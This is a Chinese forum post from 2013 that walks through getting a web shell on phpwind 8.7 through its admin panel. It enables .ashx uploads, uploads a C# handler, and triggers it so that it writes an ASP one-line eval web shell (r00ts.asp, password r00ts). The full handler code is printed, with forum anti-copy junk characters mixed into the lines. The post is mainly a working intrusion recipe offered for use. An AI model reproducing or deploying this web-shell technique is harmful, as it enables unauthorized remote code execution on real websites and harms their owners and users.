找回密码
 立即注册
查看: 2582|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小& B* J9 b5 R4 L* A5 U1 G

/ P4 V* U* \' A! {% w$ @3 h群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
: Q# U6 q* W, }4 q5 {7 i
! i1 i6 n% X2 a  m% X' J+ o发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整& V+ X+ @& S) L2 w/ U% ^

. P  u% o' Y) \; A然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx$ z2 Z& ]: ]6 n1 G, u
% a8 I/ X$ f2 f8 ^! W
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
7 R0 w: T8 R% W8 ?, V
! p+ Q2 H! P; X( I, B+ P下面是代码:* v% I% w) P+ K9 ]. Y/ |

& G0 V7 R9 J0 D: y  b* x$ |<%@ WebHandler Language="C#"Class="Handler" %>+ j) Z' @- S3 j8 D" H; n8 q
using System;3 E; o) a1 v4 d7 I, G7 B  R7 u
using System.Web;
: ~" @' k4 a- `$ Xusing System.IO;
7 _$ I$ b9 _) F* x3 o) t+ `public class Handler : IHttpHandler {2 g0 W5 k" x5 Q
public void ProcessRequest (HttpContext context) {
: R; u& l5 }* ?8 q2 econtext.Response.ContentType = "text/plain";
; ~3 X9 g4 p8 E. B- }! |% qStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
% P# Q0 {! J: K5 [* {; Gfile1.Write("<%eval request(\"r00ts\")%>");# K" |# X: o7 v  h1 z  g
file1.Flush();- ^+ ]8 K& V& u  @2 |2 t$ F
file1.Close();
/ ~' t8 q1 v4 x; M}
1 J0 c8 E) ^3 C! zpublic bool IsReusable {2 o! X) i; W4 |; O% E
get {3 U$ e0 h+ Y% K. P/ u2 x& y; e
return false;! t9 G( o4 I- h0 ]7 ^% \" o7 t( Z
}
" K$ H: T2 [" J& M% t# E6 Q: p/ t}) B# e: h. R3 g! t4 S
}1 u1 M: s' I4 m7 j0 g. D' @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表